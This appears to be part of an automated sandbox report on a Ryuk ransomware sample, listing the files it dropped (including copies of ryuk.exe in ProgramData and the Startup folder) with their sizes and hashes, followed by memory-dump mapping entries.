SHA512bc2216b3c363f5466dd290bb0de6167c15b5f23ecfce978dde46b853b6e9ce78a8d029033805bdd6177ea0ef64612e84857d893a0b9fad31f042e05e09ac7e3b
-
C:\ProgramData\hrmlog2Filesize
292B
MD59c66e5c92f7a62d7203428c7d1cda350
SHA15b8851a561e6c39000d58f6dcc91b858caa98224
SHA2562d5f5f7ba92a73632855302d47121700e4cd39f2d6784332125ee2ac2acbc2fe
SHA5129ce06641d71ecad6f5a24b4b402193f26cafe1a21c0ec44e61b2247959c47838299f06636e7ddea9e41eeb3f1f7dcb76489f2dfac51579f509618534b1b10911
-
C:\ProgramData\hrmlog2Filesize
292B
MD59c66e5c92f7a62d7203428c7d1cda350
SHA15b8851a561e6c39000d58f6dcc91b858caa98224
SHA2562d5f5f7ba92a73632855302d47121700e4cd39f2d6784332125ee2ac2acbc2fe
SHA5129ce06641d71ecad6f5a24b4b402193f26cafe1a21c0ec44e61b2247959c47838299f06636e7ddea9e41eeb3f1f7dcb76489f2dfac51579f509618534b1b10911
-
C:\ProgramData\ryuk.exeFilesize
885KB
MD535194c73ff38dd6c3bed7c0efcff6826
SHA11a1ebd30f4a3498cc09824b6fdfdf1b8d9ae9db1
SHA2565fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae
SHA512cf2ed61ffdfad8067aff8776e0dab1f27ea2551f7497108a6cca7eb0105a5f96ea1453dde29f488433cc645e55104d7397ee4f35db51526993823ef46763f28f
-
C:\Users\Admin\AppData\Local\Temp\RYUKIDFilesize
8B
MD520bf1c3daf0bf3cfb0db6661538a9afc
SHA15db0319ce78dcae075cc393c374b0856cdc2e02a
SHA256fb3092f5b65b685c2b3550ddbabcc6313a90cced525fe2d3a3e76b692e5f09c6
SHA512bfbac6e6618881f2b8bb119da816441d6540d4137bd4df631d1b3874f301aa1c599d5e488e109adae6e2ee26f15ca67e1d98a8e09bc9fedac77c99477e00e98e
-
C:\Users\Admin\AppData\Local\Temp\hrmlog1Filesize
2KB
MD54b6fbbf03e95f33ba5c363bb67de4b9b
SHA1e45dbd1ba30ef87d57779dc8ef3f58aba87e5960
SHA2563f449da876b4329929cd0832cf5098b7f9e1c07e5e25ffcbd2bd03b80aa9ead0
SHA512bc2216b3c363f5466dd290bb0de6167c15b5f23ecfce978dde46b853b6e9ce78a8d029033805bdd6177ea0ef64612e84857d893a0b9fad31f042e05e09ac7e3b
-
C:\Users\Admin\AppData\Local\Temp\hrmlog2Filesize
292B
MD59c66e5c92f7a62d7203428c7d1cda350
SHA15b8851a561e6c39000d58f6dcc91b858caa98224
SHA2562d5f5f7ba92a73632855302d47121700e4cd39f2d6784332125ee2ac2acbc2fe
SHA5129ce06641d71ecad6f5a24b4b402193f26cafe1a21c0ec44e61b2247959c47838299f06636e7ddea9e41eeb3f1f7dcb76489f2dfac51579f509618534b1b10911
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exeFilesize
885KB
MD535194c73ff38dd6c3bed7c0efcff6826
SHA11a1ebd30f4a3498cc09824b6fdfdf1b8d9ae9db1
SHA2565fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae
SHA512cf2ed61ffdfad8067aff8776e0dab1f27ea2551f7497108a6cca7eb0105a5f96ea1453dde29f488433cc645e55104d7397ee4f35db51526993823ef46763f28f
-
memory/228-154-0x0000000000000000-mapping.dmp
-
memory/388-161-0x0000000000000000-mapping.dmp
-
memory/628-144-0x0000000000000000-mapping.dmp
-
memory/968-165-0x0000000000000000-mapping.dmp
-
memory/1124-160-0x0000000000000000-mapping.dmp
-
memory/1128-140-0x0000000000000000-mapping.dmp
-
memory/1148-146-0x0000000000000000-mapping.dmp
-
memory/1288-178-0x0000000000000000-mapping.dmp
-
memory/1312-180-0x0000000000000000-mapping.dmp
-
memory/1472-153-0x0000000000000000-mapping.dmp
-
memory/1556-155-0x0000000000000000-mapping.dmp
-
memory/1672-139-0x0000000000000000-mapping.dmp
-
memory/1732-136-0x0000000000000000-mapping.dmp
-
memory/1976-177-0x0000000000000000-mapping.dmp
-
memory/2324-149-0x0000000000000000-mapping.dmp
-
memory/2372-147-0x0000000000000000-mapping.dmp
-
memory/2464-176-0x0000000000000000-mapping.dmp
-
memory/2548-175-0x0000000000000000-mapping.dmp
-
memory/2764-150-0x0000000000000000-mapping.dmp
-
memory/2768-148-0x0000000000000000-mapping.dmp
-
memory/2896-173-0x0000000000000000-mapping.dmp
-
memory/3064-132-0x0000000000000000-mapping.dmp
-
memory/3080-157-0x0000000000000000-mapping.dmp
-
memory/3568-145-0x0000000000000000-mapping.dmp
-
memory/3596-142-0x0000000000000000-mapping.dmp
-
memory/3600-133-0x0000000000000000-mapping.dmp
-
memory/3876-179-0x0000000000000000-mapping.dmp
-
memory/3884-156-0x0000000000000000-mapping.dmp
-
memory/4112-137-0x0000000000000000-mapping.dmp
-
memory/4192-138-0x0000000000000000-mapping.dmp
-
memory/4352-152-0x0000000000000000-mapping.dmp
-
memory/4528-143-0x0000000000000000-mapping.dmp
-
memory/4532-151-0x0000000000000000-mapping.dmp
-
memory/4564-174-0x0000000000000000-mapping.dmp
-
memory/4804-169-0x0000000000000000-mapping.dmp
-
memory/5032-134-0x0000000000000000-mapping.dmp
-
memory/5060-171-0x0000000000000000-mapping.dmp
-
memory/5112-164-0x0000000000000000-mapping.dmp